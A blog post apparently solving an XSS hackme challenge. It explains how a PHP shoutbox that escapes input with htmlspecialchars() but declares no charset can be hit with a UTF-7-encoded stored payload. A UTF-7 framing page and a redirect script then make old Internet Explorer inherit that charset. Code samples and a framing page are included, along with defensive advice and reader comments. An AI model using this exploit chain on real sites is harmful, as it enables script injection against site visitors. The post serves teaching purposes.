Monday, October 25, 2010

XSS hackme challenge solution (part 2)

After revealing the first part of the solution for the XSS hackme challenge, we'll discuss the second and last part. This time we'll talk about an IE-only vulnerability that allowed you to inject and run arbitrary JavaScript code (XSS). To exploit it properly we'll need:
  • a local web server (we'll need to host some pages)
  • Internet Explorer (version 6, 7 or 8 will do)

The trick was in the...

Charsets. They allow us to represent the characters that humans write or read (e.g. letters and punctuation marks) as particular bytes that computers can process. For example, the letter 'A' in the ASCII character set is represented by one byte: 65 (decimal).
Character sets can be single-byte (each character is represented by one byte, like ANSI) or multi-byte (like UCS-2 or UTF-8). Character sets by themselves do not pose any security problems - they just offer a way to translate letters to byte streams and vice versa. The problem lies in the metadata: given an arbitrary byte stream, how do you know which letters it represents? If you don't know the charset up front, you can only guess. And unfortunately, computers sometimes have to guess. As you will see, we can use this to our advantage.
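A minimal Python sketch of the guessing problem (Python is used here only for illustration; the shoutbox itself is written in PHP). The two byte values are an arbitrary example chosen for this demonstration: the same bytes turn into different text depending on which charset the reader assumes.

```python
# The same byte stream means different things under different charsets.
raw = bytes([0xC3, 0xA9])

as_utf8 = raw.decode("utf-8")         # one character: U+00E9
as_latin1 = raw.decode("iso-8859-1")  # two characters: U+00C3 U+00A9
as_cp1251 = raw.decode("cp1251")      # two characters: U+0413 U+00A9

for name, text in [("utf-8", as_utf8),
                   ("iso-8859-1", as_latin1),
                   ("cp1251", as_cp1251)]:
    # ascii() keeps the output readable on any terminal encoding
    print(f"{name:>10}: {ascii(text)} ({len(text)} character(s))")
```

Nothing in the bytes themselves says which of the three readings is the intended one; that information has to come from somewhere else.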


Comments posted to our vulnerable shoutbox application were escaped using the htmlspecialchars() function. This was done to protect us from XSS. The protection worked fine in most cases, but it breaks down once we look at the details. What does htmlspecialchars() do? Let's look at the manual:
This function is useful in preventing user-supplied text from containing HTML markup, such as in a message board or guest book application.
The translations performed are:
  • '&' (ampersand) becomes '&amp;'
  • '"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set.
  • ''' (single quote) becomes '&#039;' only when ENT_QUOTES is set.
  • '<' (less than) becomes '&lt;'
  • '>' (greater than) becomes '&gt;'
It replaces a few characters with HTML entities. Notice the word characters - not bytes. We pass a string (a byte array) to it and it treats the bytes as characters - but what encoding does it use to know which byte represents the "<" character so it can be escaped? It accepts a charset parameter for that:
charset - Defines character set used in conversion. The default character set is ISO-8859-1.
For the purposes of this function, the charsets ISO-8859-1, ISO-8859-15, UTF-8, cp866, cp1251, cp1252, and KOI8-R are effectively equivalent, as the characters affected by htmlspecialchars() occupy the same positions in all of these charsets.
We didn't specify any charset in the code, so the function assumes that the given data is in ISO-8859-1. But what charset is it actually in?


The application doesn't care. The Content-Type header doesn't include the charset.
$ wget -S -O /dev/null
--2010-10-25 15:13:39--
Connecting to||:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Date: Mon, 25 Oct 2010 13:13:37 GMT
  Server: Apache/2
  Vary: Accept-Encoding
  Connection: close
  Content-Type: text/html
Length: unspecified [text/html]
There also isn't any meta http-equiv charset declaration in the HTML head (these meta elements serve as a fallback if the server doesn't supply this information in the headers):
// we don't have this
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
So the browsers displaying the content (they display characters, not bytes) have to guess which charset is being used, based e.g. on your language settings, the contents of the page (old browsers used to do that) or the context the page is loaded in. And this is the weak point that we'll use.
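Whether a response leaves the browser guessing can be checked mechanically. The sketch below is not part of the original challenge: declared_charset is a hypothetical helper name, and it only inspects a Content-Type header value (it does not look for a meta element). It relies on the standard library's email.message parser.

```python
from email.message import Message
from typing import Optional


def declared_charset(content_type: str) -> Optional[str]:
    """Return the charset parameter of a Content-Type value, or None."""
    msg = Message()
    msg["Content-Type"] = content_type
    # get_content_charset() lower-cases the value and returns None
    # when the header carries no charset parameter.
    return msg.get_content_charset()


# The header our shoutbox sends: no charset, so the browser must guess.
print(declared_charset("text/html"))
# What a safer response would send.
print(declared_charset("text/html; charset=iso-8859-1"))
```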

Meet UTF-7

UTF-7 is an ugly charset. Basically it's a representation of Unicode in 7 bits. Handy when you want to send MIME e-mail, but not very useful anywhere else. What is really nasty about it is that it can write our < and > characters as something completely different: < becomes +ADw- and > becomes +AD4-.
So if we send an attack string encoded in UTF-7 and the server escapes it defaulting to ISO-8859-1, it will never modify the damn thing at all. For htmlspecialchars() the string contains only safe characters such as +, A, D, w and -, and none of those dangerous < and >.
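This can be reproduced in a few lines of Python. It is a sketch under assumptions: html.escape only stands in for PHP's htmlspecialchars() (it is slightly stricter, since it also escapes single quotes), and the alert(1) payload is an illustrative example, not one of the comments actually posted to the shoutbox.

```python
import html

# UTF-7 spelling of <script>alert(1)</script>
payload = b"+ADw-script+AD4-alert(1)+ADw-/script+AD4-"

# Server side: the bytes are treated as ISO-8859-1 and escaped.
# html.escape is a stand-in for htmlspecialchars() here.
escaped = html.escape(payload.decode("iso-8859-1"))
stored = escaped.encode("iso-8859-1")

# Browser side: the same bytes, once the page is interpreted as UTF-7.
rendered = stored.decode("utf-7")

print(stored == payload)  # escaping found nothing to change
print(rendered)           # the markup reappears after UTF-7 decoding
```

The escaping step is not buggy; it simply runs under a different charset assumption than the one the browser ends up using.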

So we can add any script encoded in UTF-7 as a comment (and many of you did). Now we have a UTF-7 encoded stored XSS payload on the server. If a browser renders shoutbox.php as UTF-7, the script will run. Anyone whose browser defaults to UTF-7 is vulnerable. But no current browser defaults to UTF-7, and for a good reason (there were many UTF-7 attacks in the past)!

To run the script we have to trick the browser into believing that UTF-7 is the right charset for our shoutbox. As long as our page doesn't specify any charset in the server response, we're lucky - there is a way.

Let's frame them

When a browser has to guess the charset of a document in a frame, some browsers tend to inherit the charset from the parent document (for legacy reasons: frames used to be a navigational tool serving content from the same site). So all we have to do is create our own document with the UTF-7 charset and put an <iframe> pointing to our shoutbox.php script in it. This is the full document:
    <meta http-equiv="content-type" content="text/html;charset=utf-7">
    <iframe width=500 height=600 src=""></iframe>
Save it somewhere under the document root of your local web server and simply open it (e.g. http://localhost/utf7exploit.html).

You'll quickly find out that it only works in IE6 :( Firefox 2 fixed the charset propagation bug and no longer inherits charsets across frames on different domains. Same for IE8. See Secunia advisories for more info. So you could still exploit it, but you'd have to plant a page on the same domain as shoutbox.php. However, IE8 patched it wrong and we can still exploit it from a different (our own) domain.

UTF-7 Redirection attack

This vulnerability has been discovered by It's a simple trick - instead of pointing the iframe source directly at shoutbox.php on a different domain, we point it at our own PHP script, which redirects to the other domain using the HTTP Location header. That's enough for IE6, 7 and 8 to think that we're on the same domain, so they will happily inherit the UTF-7 charset. As simple as that. The bug is to be fixed only in IE9 (which means that WinXP users will never get the patch)!

Update 3.08.2011: As noted by @randomdross, current IE versions 6-8 have fixed this vulnerability and the attack no longer works - there is no charset inheritance anymore. I've tested on IE7 / Win XP SP3 with all current patches and it's true (however, IE7 on SP2 is still vulnerable). Congrats to Microsoft for fixing this!

The full code is:
// utf7exploit.html
    <meta http-equiv="content-type" content="text/html;charset=utf-7">
    <iframe width=500 height=600 src="redirect.php"></iframe>

// redirect.php
To exploit the vulnerability you have to:
  • inject a UTF-7 XSS payload in the shoutbox.php comment or author field
  • create a UTF-7 webpage on your domain with an iframe pointing to the redirect script
  • make the redirect script issue a Location header pointing to the shoutbox application
And that's it. Full-blown stored XSS vulnerability working on Internet Explorer.
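The redirect step needs nothing more than an HTTP redirect response. The following is a Python stand-in for illustration, not the redirect.php used in the challenge. TARGET_URL is a hypothetical placeholder, and the names redirect_response, RedirectHandler and serve, the 302 status and port 8000 are all assumptions of this sketch.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Hypothetical placeholder: substitute the address of the shoutbox page.
TARGET_URL = "http://shoutbox.example/shoutbox.php"


def redirect_response(target: str):
    """Build the status code and headers of a plain HTTP redirect."""
    return 302, [("Location", target), ("Content-Length", "0")]


class RedirectHandler(BaseHTTPRequestHandler):
    """Answers every GET request with a redirect to TARGET_URL."""

    def do_GET(self):
        status, headers = redirect_response(TARGET_URL)
        self.send_response(status)
        for name, value in headers:
            self.send_header(name, value)
        self.end_headers()


def serve(port: int = 8000) -> None:
    """Run the redirector on localhost until interrupted."""
    HTTPServer(("127.0.0.1", port), RedirectHandler).serve_forever()
```

Calling serve() starts the redirector. The framing page would then point its iframe at this server instead of at the shoutbox directly.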


To be able to run JS we had to alter the context of our payload. This time we changed the charset - we used an exotic one that encodes "<" and ">" differently. By manipulating the context we were able to overcome the escaping mechanism used by htmlspecialchars(). It's important to remember that escaping is only successful if the algorithm knows the right context. Context mismatches like this were exploited in the past (see e.g. slide 31 of SQL injection presentation) and will be in the future. Plus, we've found a weak spot in Internet Explorer that allowed us to force a charset for a web page on a different domain. Putting these two together, we found a complete stored XSS vulnerability working on all current IE versions.

If you're developing applications, always remember to:
  • emit the HTTP Content-Type header with a charset
  • if that's not possible, use the <meta> element with a charset (it should be the first element in <head>, even before the <title>!)
And stay away from UTF-7 (it's ugly) and IE (unless you'd like to be vulnerable for years). If you're interested in UTF-7-based XSS, I cherry-picked some delicious links on UTF-7.

I hope you enjoyed my first XSS challenge. I really had fun preparing it. It takes a bit of time, but I think it pays off. Would you like some additional challenges in the future? Let me know in the comments!


Regex84 said...

Very educational, thx

skeptic_fx said...

Yes Koto ! Additional XSS Challenges please :)

i_hack_sites said...

Thanks, explained it well. Now I know why my UTF-7 injection was failing. :)

disqus_NRd7Y5OOEW said...